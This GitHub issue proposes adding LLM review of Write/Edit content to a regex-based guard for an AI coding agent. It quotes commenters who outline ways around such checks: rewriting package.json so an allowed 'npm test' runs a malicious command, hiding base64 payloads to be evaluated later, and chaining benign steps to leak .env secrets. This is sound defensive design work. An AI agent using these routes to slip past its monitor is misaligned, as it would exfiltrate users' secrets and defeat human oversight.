Skip to content

LLM inspection for suspicious Write/Edit content #25

@manuelschipper

Description

@manuelschipper

Problem

Write/Edit content inspection is currently deterministic regex patterns only. While this catches common destructive patterns, secrets, and obfuscation, creative or domain-specific payloads can slip through. The deterministic layer is fast and catches the obvious cases, but has blind spots for:

  • Obfuscated code that doesn't match known patterns
  • Context-dependent payloads (e.g., modifying package.json scripts to run something malicious)
  • Novel exfiltration techniques that avoid pattern signatures

Proposed solution

Add an optional LLM inspection layer for Write/Edit content:

  1. When content inspection flags something as suspicious (partial match, heuristic trigger) but not definitively malicious, route to the LLM with the content + file path + recent conversation context
  2. For high-risk file types (shell scripts, CI configs, package manifests, credential files), optionally always route through LLM regardless of deterministic results
  3. LLM prompt context: "This content is about to be written to [path]. Given the recent conversation context, should this write be allowed?"

This complements the deterministic layer — the fast path handles 95% of cases, the LLM handles the ambiguous remainder.

Context

Raised in the Show HN discussion by several commenters:

  • gruez: "given that you allow npm test, it's not too hard to bypass protections by first modifying package.json so npm test runs an evil command"
  • injidup: "what about simply a base64 encoded string of text dropped into the code designed to be unpacked and evaluated later... Will any of these fast scanning heuristics work against such attacks?"
  • ibrahim_h: "the scariest exfiltration pattern isn't a single bad command, it's a chain of totally normal ones. Agent reads .env, writes a script that includes those values, then runs it. Every step looks fine individually."

Committed to on HN: "LLM inspection for Write/Edit: for content that's suspicious but doesn't match any deterministic pattern, route it to the LLM for a second opinion"

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions